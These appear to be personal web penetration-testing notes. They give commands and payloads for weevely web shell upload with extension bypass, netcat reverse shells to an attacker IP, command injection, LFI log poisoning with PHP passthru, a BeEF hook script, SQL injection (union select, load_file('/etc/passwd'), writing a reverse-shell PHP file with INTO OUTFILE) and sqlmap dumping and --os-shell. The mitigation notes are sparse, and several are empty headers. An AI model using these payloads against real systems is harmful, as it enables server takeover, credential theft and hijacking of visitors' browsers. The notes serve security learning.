Note: these tools are being used only for legal pentesting purposes.
git clone https://github.com/guelfoweb/knock.git
cd knock
# activate venv if needed
pip3 install -r requirements.txt
python3 knockpy.py <DOMAIN>
dirb <URL> -o output.txt
generate a shell-accessing script:
weevly generate <ACCESSPASS> shell.php
Then try to upload this file using the "Upload" button on the website. Sometimes sites do not check for file extension (whether it is php or .jpg), sometimes they check extension incorrectly (Apache is known for incorrect processing of "double" extensions). Sometimes we may need to change Content-Type using Burpsuite proxy to image/jpeg or something, when the POST request is intercepted (manually). Once the file is uploaded, open it from the server, and then connect to the remote shell via weevly:
weevly <SERVER/FILE/LOCATION/shell.php> <ACCESSPASS>
we have a shell access to the server!
Mitigation:
if it is possible to run a shell command on the server (missing input validation?) and commands being passed directly to shell, on our pc we can run:
nc -vv -l -p 8081
On the server we then run:
nc -e /bin/sh <OURPCIPADDRESS> 8081
The server then connects to us. This technique is called reverse shell.
How to run the command on the server? We can try to use ; <our command>
or | <our command>
to imitate pipe or multiple commands bash feature.
Having shell access, we can upload (pull) to the server any files using wget
/curl
.
Mitigation:
When url allows specifying filename, we can specify arbitrary filename/path (e.g., /etc/passwd). We can possibly read logs, etc.
Using LFI we can print /proc/self/environ
, and this "file" contains user agent and other variables. Now, we can pass some <?php passthru("echo hello world from bash!") ?>
code as part of user agent, which will be executed on the server side - and set up remote shell.
Similarly, if we can "print" log files (/var/log/auth.log
or /var/log/apache2/access.log
), we can add some <?php ... ?>
code there, to make sure it gets executed when the requested file is rendered by LFI call. Sometimes, instead of sending direct netcat server command to passthru, we send it base64encoded (and apply base64_decode() php function later), so we avoid using forbidden chars in the log.
Similarly, when the url allows specifying file path located on a remote server, we can including some php code with in such file, and pass the link to the server being attacked.
Sometimes we need to bypass server filtering, by using different casing (hTTp instead of http). In general, filters can always be bypassed.
Mitigation: allow static file inclusion only (and prevent local/remote file inclusion). Static file inclusion means, specifying files in code, not allowing user to specify random included php files in GET/POST requests. If we allow specifying arbitrary filenames, always compare the requested filename with the strict list of allowed files!
Mitigation: We need to make sure the user actually made the request, instead of request being made on his behalf by some third-party server or file/page.
Token = sha256hash(userid+requestid+secretstring)
Now the server, having received this token back, can re-calculate this token and compare to the token received from client. This is how the server will know, that the request, initiated by the client, was originally initiated by our server
Executing arbitrary JS code on the client side (loaded either from a db (persistent), from url (reflected) or DOM based).
JS code can be embedded not only using <script>
tag, but also inside <img src=/ onerror="jscode...">
and handlers like that.
See https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet for other techniques.
If the XSS doesnt involve sending requests to the server, it is called a DOM XSS.
Persistent (stored in database) xss is dangerous, because any user visiting website gets the script executed automatically (including the admin, who visits it often for audits). Temporary (reflected) xss is not stored anywhere, but is executed only when user visits some link.
XSS can be exploited using linux beef-xss package. On the website we embed a script string, something like <script src="http://<ipwithrunningbeef>:3000/hook.js"></script>
, then all the users that open the website automatically connect to our beef server.
Once beef script js module has been injected onto the page, we can see a "zombie browser" in the list on the computer where beef server had been launched. What we can do now:
And many more other modules from the "commands" tab.
XSS Vumnerability mitigation: Any input parameter (strings, ids, urls) must be filtered by escaping dangerous characters (like, replacing dangerous chars). As a user, do not launch suspicious binaries. Ignore "you've been logged out" windows.
See https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
’
, #
(sql comment character that makes sql parser ignore the rest of the string), also and 1=1
, and 0=1
, or 1=1
clauses.If the filtering of the characters is done on the client side, use burp proxy to modify raw request manually. In general burp proxy allows examining and modifying any get/post requests made by a web browser
union select 1,2,3,4,5,...,N
to figure out which columns are being output to the HTML document. Then union select 1,2,3, database(), user(), version()
to retrieve needed info about the database. There is also union select 1,2,3, table_name, 4, 5 from information_schema.tables
. We could also call load_file('/etc/passwd') as part of the union select request.union select
clause we can get a lot of service information from the database (list databases, tables, table columns, etc)'
wouldn't help to detect sql injection possibility. We should use ' and 1=1
and ' and 1=0
to detect it.'
characters in the request. Then we can try to use hex name with 0x prefix (like, where table_schema = 0x11223344
)load_file('filepath')
) we can save text data into a file, doing something like this (often mysql isn't allowed writing to folders like /var/www.):union select null, 'some text', null, null, null into outfile '/var/tmp/myfile.txt'
union select '<?passthru("nc -e /bin/sh SERVER_IP 8080");?>'
, null into outfile '/var/tmp/reverse.php', and then somehow launch the file using another website's vulnerability. sqlmap -u <url_with_get_params>
sqlmap -u ... -D databasename --tables
sqlmap -u ... -D databasename -T tablename --dump
--os-shell
argument (if mysql has permissions for saving files).--sql-shell
, that allows executing arbitrary SQL expressions.Mitigation:
+
or /**/
. For comments we can use #
, --
, /*
, '//', sometimes we need to add ;
or url encoded vals.Extra tips: